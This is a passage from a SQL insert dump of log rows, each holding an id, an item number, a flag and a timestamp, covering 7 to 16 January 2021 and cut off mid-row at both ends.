20:15:02'),(10899,1614,1,'2021-01-07','2021-01-07 21:16:32'),(10900,108,1,'2021-01-07','2021-01-07 21:26:13'),(10901,2609,1,'2021-01-07','2021-01-07 21:57:05'),(10902,2309,1,'2021-01-07','2021-01-07 22:06:32'),(10903,1588,1,'2021-01-07','2021-01-07 22:09:06'),(10904,1596,1,'2021-01-07','2021-01-07 22:13:04'),(10905,1598,1,'2021-01-07','2021-01-07 22:17:20'),(10906,1614,1,'2021-01-07','2021-01-07 22:36:13'),(10907,1718,1,'2021-01-07','2021-01-07 22:46:35'),(10908,1586,1,'2021-01-07','2021-01-07 22:56:34'),(10909,1606,1,'2021-01-07','2021-01-07 22:56:46'),(10910,91,1,'2021-01-08','2021-01-08 01:58:52'),(10911,1600,1,'2021-01-08','2021-01-08 02:20:34'),(10912,1604,1,'2021-01-08','2021-01-08 02:30:48'),(10913,1600,1,'2021-01-08','2021-01-08 02:56:15'),(10914,2159,1,'2021-01-08','2021-01-08 03:11:37'),(10915,2658,1,'2021-01-08','2021-01-08 03:51:59'),(10916,2813,1,'2021-01-08','2021-01-08 04:22:19'),(10917,473,1,'2021-01-08','2021-01-08 05:08:29'),(10918,478,1,'2021-01-08','2021-01-08 05:13:06'),(10919,2964,1,'2021-01-08','2021-01-08 05:46:34'),(10920,2309,1,'2021-01-08','2021-01-08 05:52:58'),(10921,2609,1,'2021-01-08','2021-01-08 06:31:42'),(10922,3087,1,'2021-01-08','2021-01-08 06:39:28'),(10923,3280,1,'2021-01-08','2021-01-08 06:52:26'),(10924,335,1,'2021-01-08','2021-01-08 07:02:26'),(10925,2609,1,'2021-01-08','2021-01-08 07:33:17'),(10926,1586,1,'2021-01-08','2021-01-08 08:03:02'),(10927,3181,1,'2021-01-08','2021-01-08 10:03:59'),(10928,1586,1,'2021-01-08','2021-01-08 10:25:30'),(10929,91,1,'2021-01-08','2021-01-08 10:26:43'),(10930,1588,1,'2021-01-08','2021-01-08 11:11:54'),(10931,1600,1,'2021-01-08','2021-01-08 11:53:24'),(10932,2161,1,'2021-01-08','2021-01-08 12:03:31'),(10933,1586,1,'2021-01-08','2021-01-08 12:10:23'),(10934,84,1,'2021-01-08','2021-01-08 12:17:35'),(10935,3287,1,'2021-01-08','2021-01-08 12:27:42'),(10936,1604,1,'2021-01-08','2021-01-08 13:04:19'),(10937,1582,1,'2021-01-08','2021-01-08 14:35:11'),(10938,87,1,'2021-01-08','2021-01-08 14:55:05'),(10939,87,1,'2021-01-08','2021-01-08 14:55:34'),(10940,91,1,'2021-01-08','2021-01-08 14:56:23'),(10941,91,1,'2021-01-08','2021-01-08 16:08:29'),(10942,91,1,'2021-01-08','2021-01-08 16:08:32'),(10943,2159,1,'2021-01-08','2021-01-08 16:25:53'),(10944,1586,1,'2021-01-08','2021-01-08 16:44:23'),(10945,1586,1,'2021-01-08','2021-01-08 16:55:17'),(10946,76,1,'2021-01-08','2021-01-08 17:44:54'),(10947,2309,1,'2021-01-08','2021-01-08 17:53:00'),(10948,2309,1,'2021-01-08','2021-01-08 17:55:58'),(10949,3287,1,'2021-01-08','2021-01-08 18:00:12'),(10950,3285,1,'2021-01-08','2021-01-08 18:00:21'),(10951,3285,1,'2021-01-08','2021-01-08 18:00:32'),(10952,3282,1,'2021-01-08','2021-01-08 18:00:39'),(10953,3280,1,'2021-01-08','2021-01-08 18:00:42'),(10954,80,1,'2021-01-08','2021-01-08 18:05:49'),(10955,2609,1,'2021-01-08','2021-01-08 18:06:07'),(10956,89,1,'2021-01-08','2021-01-08 18:08:44'),(10957,72,1,'2021-01-08','2021-01-08 18:09:16'),(10958,2904,1,'2021-01-08','2021-01-08 19:50:14'),(10959,1606,1,'2021-01-08','2021-01-08 21:17:17'),(10960,2159,1,'2021-01-08','2021-01-08 21:37:48'),(10961,2609,1,'2021-01-08','2021-01-08 21:45:58'),(10962,1586,1,'2021-01-08','2021-01-08 21:54:59'),(10963,1586,1,'2021-01-08','2021-01-08 21:55:02'),(10964,1586,1,'2021-01-08','2021-01-08 22:11:43'),(10965,1544,1,'2021-01-08','2021-01-08 22:47:46'),(10966,1718,1,'2021-01-08','2021-01-08 22:56:35'),(10967,1718,1,'2021-01-08','2021-01-08 22:57:05'),(10968,3087,1,'2021-01-08','2021-01-08 22:59:27'),(10969,3099,1,'2021-01-08','2021-01-08 23:00:12'),(10970,1718,1,'2021-01-08','2021-01-08 23:16:34'),(10971,3030,1,'2021-01-09','2021-01-09 00:54:50'),(10972,3030,1,'2021-01-09','2021-01-09 00:55:16'),(10973,91,1,'2021-01-09','2021-01-09 02:15:47'),(10974,87,1,'2021-01-09','2021-01-09 02:51:05'),(10975,1582,1,'2021-01-09','2021-01-09 03:38:18'),(10976,1582,1,'2021-01-09','2021-01-09 03:38:31'),(10977,108,1,'2021-01-09','2021-01-09 04:11:16'),(10978,2309,1,'2021-01-09','2021-01-09 05:08:14'),(10979,2165,1,'2021-01-09','2021-01-09 05:22:44'),(10980,1606,1,'2021-01-09','2021-01-09 07:02:44'),(10981,2609,1,'2021-01-09','2021-01-09 07:39:54'),(10982,1586,1,'2021-01-09','2021-01-09 10:09:07'),(10983,68,1,'2021-01-09','2021-01-09 10:15:29'),(10984,1606,1,'2021-01-09','2021-01-09 12:07:23'),(10985,2309,1,'2021-01-09','2021-01-09 14:22:04'),(10986,2309,1,'2021-01-09','2021-01-09 14:22:10'),(10987,2309,1,'2021-01-09','2021-01-09 14:26:05'),(10988,2989,1,'2021-01-09','2021-01-09 14:29:12'),(10989,2309,1,'2021-01-09','2021-01-09 14:31:57'),(10990,2309,1,'2021-01-09','2021-01-09 16:27:29'),(10991,1600,1,'2021-01-09','2021-01-09 16:36:46'),(10992,1610,1,'2021-01-09','2021-01-09 17:31:09'),(10993,1768,1,'2021-01-09','2021-01-09 17:56:46'),(10994,1600,1,'2021-01-09','2021-01-09 17:59:08'),(10995,87,1,'2021-01-09','2021-01-09 18:35:33'),(10996,1586,1,'2021-01-09','2021-01-09 19:41:52'),(10997,1697,1,'2021-01-09','2021-01-09 19:43:05'),(10998,1586,1,'2021-01-09','2021-01-09 19:44:40'),(10999,1697,1,'2021-01-09','2021-01-09 19:44:54'),(11000,1600,1,'2021-01-09','2021-01-09 19:56:08'),(11001,1586,1,'2021-01-09','2021-01-09 21:10:49'),(11002,1586,1,'2021-01-09','2021-01-09 21:11:22'),(11003,1606,1,'2021-01-09','2021-01-09 21:36:20'),(11004,1586,1,'2021-01-09','2021-01-09 22:08:38'),(11005,473,1,'2021-01-09','2021-01-09 22:33:47'),(11006,473,1,'2021-01-09','2021-01-09 22:34:49'),(11007,1586,1,'2021-01-09','2021-01-09 22:34:57'),(11008,1728,1,'2021-01-10','2021-01-10 04:25:52'),(11009,1747,1,'2021-01-10','2021-01-10 05:15:10'),(11010,1600,1,'2021-01-10','2021-01-10 07:29:36'),(11011,1594,1,'2021-01-10','2021-01-10 08:54:31'),(11012,1594,1,'2021-01-10','2021-01-10 08:57:35'),(11013,1606,1,'2021-01-10','2021-01-10 09:10:47'),(11014,1600,1,'2021-01-10','2021-01-10 09:25:42'),(11015,1600,1,'2021-01-10','2021-01-10 09:30:50'),(11016,1594,1,'2021-01-10','2021-01-10 09:34:41'),(11017,1600,1,'2021-01-10','2021-01-10 09:35:30'),(11018,1594,1,'2021-01-10','2021-01-10 09:36:47'),(11019,1586,1,'2021-01-10','2021-01-10 11:58:52'),(11020,108,1,'2021-01-10','2021-01-10 12:41:15'),(11021,1600,1,'2021-01-10','2021-01-10 12:49:01'),(11022,3087,1,'2021-01-10','2021-01-10 13:30:48'),(11023,2309,1,'2021-01-10','2021-01-10 13:49:04'),(11024,2309,1,'2021-01-10','2021-01-10 13:50:07'),(11025,2309,1,'2021-01-10','2021-01-10 13:50:23'),(11026,1600,1,'2021-01-10','2021-01-10 13:53:52'),(11027,2309,1,'2021-01-10','2021-01-10 14:32:07'),(11028,1606,1,'2021-01-10','2021-01-10 15:12:02'),(11029,2309,1,'2021-01-10','2021-01-10 16:35:47'),(11030,570,1,'2021-01-10','2021-01-10 17:05:25'),(11031,76,1,'2021-01-10','2021-01-10 17:10:13'),(11032,76,1,'2021-01-10','2021-01-10 17:11:47'),(11033,570,1,'2021-01-10','2021-01-10 17:12:29'),(11034,2769,1,'2021-01-10','2021-01-10 17:13:37'),(11035,1608,1,'2021-01-10','2021-01-10 17:27:53'),(11036,2309,1,'2021-01-10','2021-01-10 17:46:49'),(11037,2309,1,'2021-01-10','2021-01-10 17:48:01'),(11038,1600,1,'2021-01-10','2021-01-10 18:22:43'),(11039,1600,1,'2021-01-10','2021-01-10 18:23:22'),(11040,2609,1,'2021-01-10','2021-01-10 18:42:38'),(11041,3285,1,'2021-01-10','2021-01-10 18:44:15'),(11042,3030,1,'2021-01-10','2021-01-10 19:53:56'),(11043,3030,1,'2021-01-10','2021-01-10 19:54:27'),(11044,1586,1,'2021-01-10','2021-01-10 20:59:41'),(11045,2309,1,'2021-01-10','2021-01-10 21:45:22'),(11046,1600,1,'2021-01-10','2021-01-10 23:21:13'),(11047,1600,1,'2021-01-10','2021-01-10 23:22:18'),(11048,2503,1,'2021-01-10','2021-01-10 23:23:00'),(11049,1600,1,'2021-01-10','2021-01-10 23:23:23'),(11050,1606,1,'2021-01-10','2021-01-10 23:55:26'),(11051,488,1,'2021-01-11','2021-01-11 01:44:50'),(11052,3117,1,'2021-01-11','2021-01-11 01:48:03'),(11053,1600,1,'2021-01-11','2021-01-11 02:25:53'),(11054,87,1,'2021-01-11','2021-01-11 03:36:06'),(11055,2309,1,'2021-01-11','2021-01-11 03:36:16'),(11056,2309,1,'2021-01-11','2021-01-11 05:24:23'),(11057,1606,1,'2021-01-11','2021-01-11 05:47:13'),(11058,1600,1,'2021-01-11','2021-01-11 05:59:09'),(11059,1718,1,'2021-01-11','2021-01-11 07:29:40'),(11060,108,1,'2021-01-11','2021-01-11 09:01:49'),(11061,1582,1,'2021-01-11','2021-01-11 09:13:10'),(11062,1586,1,'2021-01-11','2021-01-11 09:22:32'),(11063,1606,1,'2021-01-11','2021-01-11 09:52:08'),(11064,570,1,'2021-01-11','2021-01-11 10:13:32'),(11065,2309,1,'2021-01-11','2021-01-11 10:18:11'),(11066,91,1,'2021-01-11','2021-01-11 10:27:35'),(11067,1588,1,'2021-01-11','2021-01-11 10:31:45'),(11068,1724,1,'2021-01-11','2021-01-11 10:32:27'),(11069,72,1,'2021-01-11','2021-01-11 10:35:52'),(11070,1586,1,'2021-01-11','2021-01-11 11:01:10'),(11071,80,1,'2021-01-11','2021-01-11 11:05:20'),(11072,80,1,'2021-01-11','2021-01-11 11:06:04'),(11073,1586,1,'2021-01-11','2021-01-11 11:06:13'),(11074,1586,1,'2021-01-11','2021-01-11 11:06:38'),(11075,76,1,'2021-01-11','2021-01-11 11:06:46'),(11076,76,1,'2021-01-11','2021-01-11 11:07:37'),(11077,1586,1,'2021-01-11','2021-01-11 11:08:11'),(11078,1594,1,'2021-01-11','2021-01-11 11:19:57'),(11079,1600,1,'2021-01-11','2021-01-11 11:29:27'),(11080,2904,1,'2021-01-11','2021-01-11 11:47:44'),(11081,80,1,'2021-01-11','2021-01-11 11:47:49'),(11082,80,1,'2021-01-11','2021-01-11 11:49:16'),(11083,2904,1,'2021-01-11','2021-01-11 11:49:16'),(11084,1544,1,'2021-01-11','2021-01-11 11:52:38'),(11085,1586,1,'2021-01-11','2021-01-11 12:13:39'),(11086,1586,1,'2021-01-11','2021-01-11 12:14:16'),(11087,1699,1,'2021-01-11','2021-01-11 13:11:06'),(11088,1544,1,'2021-01-11','2021-01-11 13:11:21'),(11089,1604,1,'2021-01-11','2021-01-11 13:18:38'),(11090,1598,1,'2021-01-11','2021-01-11 13:54:11'),(11091,3290,1,'2021-01-11','2021-01-11 14:08:51'),(11092,91,1,'2021-01-11','2021-01-11 14:09:19'),(11093,72,1,'2021-01-11','2021-01-11 14:10:22'),(11094,1582,1,'2021-01-11','2021-01-11 14:10:47'),(11095,1718,1,'2021-01-11','2021-01-11 14:26:38'),(11096,2956,1,'2021-01-11','2021-01-11 14:29:00'),(11097,2309,1,'2021-01-11','2021-01-11 14:58:52'),(11098,2769,1,'2021-01-11','2021-01-11 15:23:43'),(11099,108,1,'2021-01-11','2021-01-11 16:23:35'),(11100,108,1,'2021-01-11','2021-01-11 16:30:06'),(11101,1600,1,'2021-01-11','2021-01-11 17:50:55'),(11102,1724,1,'2021-01-11','2021-01-11 17:51:21'),(11103,87,1,'2021-01-11','2021-01-11 18:25:51'),(11104,108,1,'2021-01-11','2021-01-11 18:55:49'),(11105,3056,1,'2021-01-11','2021-01-11 18:56:11'),(11106,1606,1,'2021-01-11','2021-01-11 19:25:58'),(11107,2971,1,'2021-01-11','2021-01-11 19:41:25'),(11108,1608,1,'2021-01-11','2021-01-11 20:35:02'),(11109,1598,1,'2021-01-11','2021-01-11 20:35:53'),(11110,1608,1,'2021-01-11','2021-01-11 20:39:24'),(11111,1709,1,'2021-01-11','2021-01-11 21:00:47'),(11112,1544,1,'2021-01-11','2021-01-11 21:46:44'),(11113,1606,1,'2021-01-11','2021-01-11 22:05:08'),(11114,2309,1,'2021-01-11','2021-01-11 22:24:51'),(11115,2309,1,'2021-01-11','2021-01-11 22:25:58'),(11116,110,1,'2021-01-11','2021-01-11 22:46:31'),(11117,1732,1,'2021-01-11','2021-01-11 23:36:34'),(11118,1598,1,'2021-01-12','2021-01-12 00:32:24'),(11119,1586,1,'2021-01-12','2021-01-12 00:32:45'),(11120,87,1,'2021-01-12','2021-01-12 00:33:51'),(11121,1586,1,'2021-01-12','2021-01-12 00:36:45'),(11122,1598,1,'2021-01-12','2021-01-12 00:37:26'),(11123,108,1,'2021-01-12','2021-01-12 01:24:30'),(11124,80,1,'2021-01-12','2021-01-12 02:15:16'),(11125,80,1,'2021-01-12','2021-01-12 02:15:28'),(11126,2956,1,'2021-01-12','2021-01-12 02:53:22'),(11127,1732,1,'2021-01-12','2021-01-12 03:41:48'),(11128,108,1,'2021-01-12','2021-01-12 04:37:47'),(11129,1606,1,'2021-01-12','2021-01-12 06:07:07'),(11130,1606,1,'2021-01-12','2021-01-12 06:27:59'),(11131,1544,1,'2021-01-12','2021-01-12 06:58:32'),(11132,87,1,'2021-01-12','2021-01-12 07:08:45'),(11133,1606,1,'2021-01-12','2021-01-12 07:34:05'),(11134,80,1,'2021-01-12','2021-01-12 07:34:28'),(11135,1606,1,'2021-01-12','2021-01-12 07:34:53'),(11136,1606,1,'2021-01-12','2021-01-12 07:36:28'),(11137,1582,1,'2021-01-12','2021-01-12 08:12:04'),(11138,1709,1,'2021-01-12','2021-01-12 08:58:25'),(11139,2154,1,'2021-01-12','2021-01-12 10:02:32'),(11140,87,1,'2021-01-12','2021-01-12 10:03:17'),(11141,1600,1,'2021-01-12','2021-01-12 10:22:57'),(11142,3127,1,'2021-01-12','2021-01-12 11:44:13'),(11143,3127,1,'2021-01-12','2021-01-12 11:44:32'),(11144,2956,1,'2021-01-12','2021-01-12 12:28:45'),(11145,1582,1,'2021-01-12','2021-01-12 12:40:14'),(11146,1586,1,'2021-01-12','2021-01-12 14:02:39'),(11147,1600,1,'2021-01-12','2021-01-12 14:10:23'),(11148,1600,1,'2021-01-12','2021-01-12 14:21:44'),(11149,1582,1,'2021-01-12','2021-01-12 14:24:04'),(11150,3307,1,'2021-01-12','2021-01-12 14:37:51'),(11151,108,1,'2021-01-12','2021-01-12 15:39:10'),(11152,1598,1,'2021-01-12','2021-01-12 15:42:13'),(11153,1582,1,'2021-01-12','2021-01-12 16:07:29'),(11154,1586,1,'2021-01-12','2021-01-12 16:17:08'),(11155,91,1,'2021-01-12','2021-01-12 16:19:39'),(11156,87,1,'2021-01-12','2021-01-12 16:23:36'),(11157,485,1,'2021-01-12','2021-01-12 16:41:27'),(11158,3053,1,'2021-01-12','2021-01-12 16:45:28'),(11159,3307,1,'2021-01-12','2021-01-12 16:57:24'),(11160,1608,1,'2021-01-12','2021-01-12 17:15:38'),(11161,2309,1,'2021-01-12','2021-01-12 17:32:59'),(11162,1709,1,'2021-01-12','2021-01-12 18:19:46'),(11163,1600,1,'2021-01-12','2021-01-12 18:20:45'),(11164,80,1,'2021-01-12','2021-01-12 18:25:19'),(11165,110,1,'2021-01-12','2021-01-12 18:49:31'),(11166,1588,1,'2021-01-12','2021-01-12 19:17:04'),(11167,1544,1,'2021-01-12','2021-01-12 20:30:44'),(11168,1602,1,'2021-01-12','2021-01-12 22:37:23'),(11169,2769,1,'2021-01-12','2021-01-12 22:38:46'),(11170,1588,1,'2021-01-12','2021-01-12 22:49:11'),(11171,2769,1,'2021-01-12','2021-01-12 22:50:10'),(11172,1586,1,'2021-01-12','2021-01-12 22:55:33'),(11173,1582,1,'2021-01-13','2021-01-13 04:25:32'),(11174,1544,1,'2021-01-13','2021-01-13 05:09:56'),(11175,1709,1,'2021-01-13','2021-01-13 05:39:46'),(11176,1732,1,'2021-01-13','2021-01-13 06:10:19'),(11177,2956,1,'2021-01-13','2021-01-13 06:30:23'),(11178,2309,1,'2021-01-13','2021-01-13 08:29:55'),(11179,2309,1,'2021-01-13','2021-01-13 08:42:49'),(11180,2309,1,'2021-01-13','2021-01-13 08:45:05'),(11181,1606,1,'2021-01-13','2021-01-13 08:52:05'),(11182,1600,1,'2021-01-13','2021-01-13 09:58:22'),(11183,1594,1,'2021-01-13','2021-01-13 10:05:36'),(11184,1594,1,'2021-01-13','2021-01-13 10:06:59'),(11185,2457,1,'2021-01-13','2021-01-13 10:12:27'),(11186,3072,1,'2021-01-13','2021-01-13 10:49:46'),(11187,3307,1,'2021-01-13','2021-01-13 10:54:19'),(11188,1586,1,'2021-01-13','2021-01-13 11:03:48'),(11189,76,1,'2021-01-13','2021-01-13 11:05:42'),(11190,2309,1,'2021-01-13','2021-01-13 12:19:41'),(11191,1604,1,'2021-01-13','2021-01-13 12:59:16'),(11192,2309,1,'2021-01-13','2021-01-13 13:47:55'),(11193,2309,1,'2021-01-13','2021-01-13 13:48:04'),(11194,1608,1,'2021-01-13','2021-01-13 14:56:14'),(11195,1586,1,'2021-01-13','2021-01-13 15:09:49'),(11196,1586,1,'2021-01-13','2021-01-13 15:17:40'),(11197,91,1,'2021-01-13','2021-01-13 15:18:36'),(11198,1596,1,'2021-01-13','2021-01-13 15:38:48'),(11199,1596,1,'2021-01-13','2021-01-13 15:39:28'),(11200,1598,1,'2021-01-13','2021-01-13 16:37:55'),(11201,1600,1,'2021-01-13','2021-01-13 16:41:36'),(11202,1600,1,'2021-01-13','2021-01-13 16:41:41'),(11203,1544,1,'2021-01-13','2021-01-13 16:47:08'),(11204,2309,1,'2021-01-13','2021-01-13 17:00:40'),(11205,3107,1,'2021-01-13','2021-01-13 17:11:09'),(11206,1586,1,'2021-01-13','2021-01-13 17:13:21'),(11207,91,1,'2021-01-13','2021-01-13 17:13:54'),(11208,1592,1,'2021-01-13','2021-01-13 17:30:02'),(11209,110,1,'2021-01-13','2021-01-13 19:20:26'),(11210,1612,1,'2021-01-13','2021-01-13 20:26:31'),(11211,87,1,'2021-01-13','2021-01-13 20:34:01'),(11212,2617,1,'2021-01-13','2021-01-13 20:35:06'),(11213,2775,1,'2021-01-13','2021-01-13 20:37:07'),(11214,3251,1,'2021-01-13','2021-01-13 20:38:46'),(11215,2609,1,'2021-01-13','2021-01-13 20:43:38'),(11216,570,1,'2021-01-13','2021-01-13 20:44:27'),(11217,2609,1,'2021-01-13','2021-01-13 21:10:53'),(11218,2609,1,'2021-01-13','2021-01-13 21:14:49'),(11219,108,1,'2021-01-13','2021-01-13 21:29:01'),(11220,2309,1,'2021-01-13','2021-01-13 21:38:26'),(11221,1588,1,'2021-01-13','2021-01-13 21:47:53'),(11222,87,1,'2021-01-13','2021-01-13 22:06:11'),(11223,1600,1,'2021-01-13','2021-01-13 22:18:27'),(11224,2956,1,'2021-01-13','2021-01-13 23:52:18'),(11225,1612,1,'2021-01-14','2021-01-14 00:32:25'),(11226,1602,1,'2021-01-14','2021-01-14 02:18:53'),(11227,2297,1,'2021-01-14','2021-01-14 02:19:58'),(11228,1602,1,'2021-01-14','2021-01-14 02:25:03'),(11229,1544,1,'2021-01-14','2021-01-14 03:19:41'),(11230,2159,1,'2021-01-14','2021-01-14 03:52:44'),(11231,2159,1,'2021-01-14','2021-01-14 03:53:53'),(11232,2159,1,'2021-01-14','2021-01-14 03:55:19'),(11233,2159,1,'2021-01-14','2021-01-14 03:56:07'),(11234,2309,1,'2021-01-14','2021-01-14 07:33:12'),(11235,108,1,'2021-01-14','2021-01-14 08:30:55'),(11236,87,1,'2021-01-14','2021-01-14 08:51:23'),(11237,108,1,'2021-01-14','2021-01-14 09:16:29'),(11238,2457,1,'2021-01-14','2021-01-14 09:27:22'),(11239,2309,1,'2021-01-14','2021-01-14 09:27:28'),(11240,3072,1,'2021-01-14','2021-01-14 09:30:47'),(11241,1600,1,'2021-01-14','2021-01-14 09:49:09'),(11242,1588,1,'2021-01-14','2021-01-14 10:39:33'),(11243,1598,1,'2021-01-14','2021-01-14 10:52:57'),(11244,1600,1,'2021-01-14','2021-01-14 11:30:34'),(11245,68,1,'2021-01-14','2021-01-14 11:34:45'),(11246,68,1,'2021-01-14','2021-01-14 11:38:24'),(11247,1586,1,'2021-01-14','2021-01-14 11:40:07'),(11248,2309,1,'2021-01-14','2021-01-14 11:47:58'),(11249,3290,1,'2021-01-14','2021-01-14 12:01:49'),(11250,1586,1,'2021-01-14','2021-01-14 12:17:39'),(11251,68,1,'2021-01-14','2021-01-14 12:22:45'),(11252,1586,1,'2021-01-14','2021-01-14 12:22:54'),(11253,1586,1,'2021-01-14','2021-01-14 12:23:14'),(11254,1592,1,'2021-01-14','2021-01-14 12:25:48'),(11255,68,1,'2021-01-14','2021-01-14 12:26:29'),(11256,3107,1,'2021-01-14','2021-01-14 12:44:42'),(11257,1606,1,'2021-01-14','2021-01-14 13:40:55'),(11258,1586,1,'2021-01-14','2021-01-14 14:12:17'),(11259,80,1,'2021-01-14','2021-01-14 14:12:53'),(11260,1586,1,'2021-01-14','2021-01-14 14:43:54'),(11261,89,1,'2021-01-14','2021-01-14 14:45:42'),(11262,1582,1,'2021-01-14','2021-01-14 14:46:12'),(11263,1586,1,'2021-01-14','2021-01-14 14:46:17'),(11264,3041,1,'2021-01-14','2021-01-14 14:56:39'),(11265,1596,1,'2021-01-14','2021-01-14 16:43:31'),(11266,1596,1,'2021-01-14','2021-01-14 16:44:58'),(11267,91,1,'2021-01-14','2021-01-14 16:45:17'),(11268,91,1,'2021-01-14','2021-01-14 16:45:18'),(11269,76,1,'2021-01-14','2021-01-14 16:46:14'),(11270,91,1,'2021-01-14','2021-01-14 16:47:42'),(11271,108,1,'2021-01-14','2021-01-14 16:48:24'),(11272,108,1,'2021-01-14','2021-01-14 16:49:09'),(11273,91,1,'2021-01-14','2021-01-14 16:49:34'),(11274,2159,1,'2021-01-14','2021-01-14 16:53:27'),(11275,2159,1,'2021-01-14','2021-01-14 16:55:42'),(11276,2159,1,'2021-01-14','2021-01-14 16:57:19'),(11277,1600,1,'2021-01-14','2021-01-14 17:30:04'),(11278,1747,1,'2021-01-14','2021-01-14 19:26:08'),(11279,76,1,'2021-01-14','2021-01-14 19:27:05'),(11280,1747,1,'2021-01-14','2021-01-14 19:27:19'),(11281,1709,1,'2021-01-14','2021-01-14 19:28:44'),(11282,2159,1,'2021-01-14','2021-01-14 19:30:27'),(11283,1600,1,'2021-01-14','2021-01-14 19:44:57'),(11284,1600,1,'2021-01-14','2021-01-14 19:55:35'),(11285,3030,1,'2021-01-14','2021-01-14 21:00:46'),(11286,3030,1,'2021-01-14','2021-01-14 21:02:15'),(11287,2309,1,'2021-01-14','2021-01-14 21:40:09'),(11288,2309,1,'2021-01-14','2021-01-14 22:23:25'),(11289,2309,1,'2021-01-14','2021-01-14 22:23:30'),(11290,2159,1,'2021-01-14','2021-01-14 22:28:08'),(11291,110,1,'2021-01-14','2021-01-14 22:31:10'),(11292,2309,1,'2021-01-14','2021-01-14 22:47:44'),(11293,2309,1,'2021-01-14','2021-01-14 22:49:28'),(11294,87,1,'2021-01-15','2021-01-15 01:04:28'),(11295,1612,1,'2021-01-15','2021-01-15 02:58:59'),(11296,1604,1,'2021-01-15','2021-01-15 03:13:44'),(11297,1604,1,'2021-01-15','2021-01-15 03:13:54'),(11298,1709,1,'2021-01-15','2021-01-15 04:12:56'),(11299,2813,1,'2021-01-15','2021-01-15 06:21:25'),(11300,2769,1,'2021-01-15','2021-01-15 08:26:21'),(11301,1610,1,'2021-01-15','2021-01-15 08:55:14'),(11302,72,1,'2021-01-15','2021-01-15 09:08:07'),(11303,1602,1,'2021-01-15','2021-01-15 09:22:35'),(11304,2159,1,'2021-01-15','2021-01-15 10:06:55'),(11305,2159,1,'2021-01-15','2021-01-15 10:20:36'),(11306,2309,1,'2021-01-15','2021-01-15 10:31:43'),(11307,2159,1,'2021-01-15','2021-01-15 10:34:15'),(11308,1606,1,'2021-01-15','2021-01-15 10:49:33'),(11309,2159,1,'2021-01-15','2021-01-15 11:08:33'),(11310,2159,1,'2021-01-15','2021-01-15 11:11:19'),(11311,2159,1,'2021-01-15','2021-01-15 11:13:38'),(11312,1600,1,'2021-01-15','2021-01-15 11:34:48'),(11313,110,1,'2021-01-15','2021-01-15 11:41:57'),(11314,2309,1,'2021-01-15','2021-01-15 11:49:00'),(11315,2769,1,'2021-01-15','2021-01-15 13:34:48'),(11316,2769,1,'2021-01-15','2021-01-15 13:36:58'),(11317,2309,1,'2021-01-15','2021-01-15 13:54:29'),(11318,1766,1,'2021-01-15','2021-01-15 14:42:53'),(11319,2309,1,'2021-01-15','2021-01-15 15:20:35'),(11320,1610,1,'2021-01-15','2021-01-15 16:28:49'),(11321,2309,1,'2021-01-15','2021-01-15 16:57:30'),(11322,3316,1,'2021-01-15','2021-01-15 18:30:09'),(11323,3313,1,'2021-01-15','2021-01-15 18:31:28'),(11324,2410,1,'2021-01-15','2021-01-15 18:53:18'),(11325,3316,1,'2021-01-15','2021-01-15 19:36:29'),(11326,2457,1,'2021-01-15','2021-01-15 19:37:28'),(11327,2904,1,'2021-01-15','2021-01-15 19:38:39'),(11328,2904,1,'2021-01-15','2021-01-15 19:39:19'),(11329,1586,1,'2021-01-15','2021-01-15 20:01:40'),(11330,68,1,'2021-01-15','2021-01-15 20:04:44'),(11331,91,1,'2021-01-15','2021-01-15 20:05:16'),(11332,68,1,'2021-01-15','2021-01-15 20:09:49'),(11333,1586,1,'2021-01-15','2021-01-15 20:09:55'),(11334,1586,1,'2021-01-15','2021-01-15 20:10:03'),(11335,2159,1,'2021-01-15','2021-01-15 21:39:29'),(11336,2159,1,'2021-01-15','2021-01-15 21:39:32'),(11337,2159,1,'2021-01-15','2021-01-15 21:51:06'),(11338,1586,1,'2021-01-15','2021-01-15 22:09:48'),(11339,2309,1,'2021-01-15','2021-01-15 22:24:50'),(11340,1592,1,'2021-01-16','2021-01-16 00:13:16'),(11341,1544,1,'2021-01-16','2021-01-16 00:13:57'),(11342,1592,1,'2021-01-16','2021-01-16 00:14:11'),(11343,74,1,'2021-01-16','2021-01-16 00:15:19'),(11344,87,1,'2021-01-16','2021-01-16 00:16:27'),(11345,484,1,'2021-01-16','2021-01-16 00:16:40'),(11346,76,1,'2021-01-16','2021-01-16 00:16:52'),(11347,484,1,'2021-01-16','2021-01-16 00:17:11'),(11348,87,1,'2021-01-16','2021-01-16 00:17:14'),(11349,74,1,'2021-01-16','2021-01-16 00:17:17'),(11350,1592,1,'2021-01-16','2021-01-16 00:17:24'),(11351,1608,1,'2021-01-16','2021-01-16 03:33:11'),(11352,1600,1,'2021-01-16','2021-01-16 03:51:08'),(11353,1586,1,'2021-01-16','2021-01-16 04:02:46'),(11354,1582,1,'2021-01-16','2021-01-16 04:09:07'),(11355,87,1,'2021-01-16','2021-01-16 04:09:52'),(11356,473,1,'2021-01-16','2021-01-16 04:12:47'),(11357,467,1,'2021-01-16','2021-01-16 04:12:53'),(11358,487,1,'2021-01-16','2021-01-16 04:13:02'),(11359,486,1,'2021-01-16','2021-01-16 04:13:04'),(11360,2309,1,'2021-01-16','2021-01-16 05:32:58'),(11361,2309,1,'2021-01-16','2021-01-16 05:33:01'),(11362,1600,1,'2021-01-16','2021-01-16 07:26:37'),(11363,1604,1,'2021-01-16','2021-01-16 07:36:50'),(11364,110,1,'2021-01-16','2021-01-16 07:56:57'),(11365,2309,1,'2021-01-16','2021-01-16 08:51:30'),(11366,91,1,'2021-01-16','2021-01-16 10:55:51'),(11367,2159,1,'2021-01-16','2021-01-16 12:01:42'),(11368,1718,1,'2021-01-16','2021-01-16 12:06:20'),(11369,2309,1,'2021-01-16','2021-01-16 12:11:21'),(11370,2159,1,'2021-01-16','2021-01-16 13:03:44'),(11371,2309,1,'2021-01-16','2021-01-16 14:10:10'),(11372,2309,1,'2021-01-16','2021-01-16 14:11:03'),(11373,2159,1,'2021-01-16','2021-01-16 14:16:47'),(11374,2159,1,'2021-01-16','2021-01-16 14:17:12'),(11375,2159,1,'2021-01-16','2021-01-16 14:17:21'),(11376,2159,1,'2021-01-16','2021-01-16 14:26:28'),(11377,2159,1,'2021-01-16','2021-01-16 14:26:53'),(11378,2159,1,'2021-01-16','2021-01-16 14:48:44'),(11379,1602,1,'2021-01-16','2021-01-16 15:08:37'),(11380,3316,1,'2021-01-16','2021-01-16 15:58:37'),(11381,2159,1,'2021-01-16','2021-01-16 16:45:34'),(11382,1600,1,'2021-01-16','2021-01-16 17:50:34'),(11383,1586,1,'2021-01-16','2021-01-16 18:19:04'),(11384,570,1,'2021-01-16','2021-01-16 18:32:18'),(11385,2309,1,'2021-01-16','2021-01-16 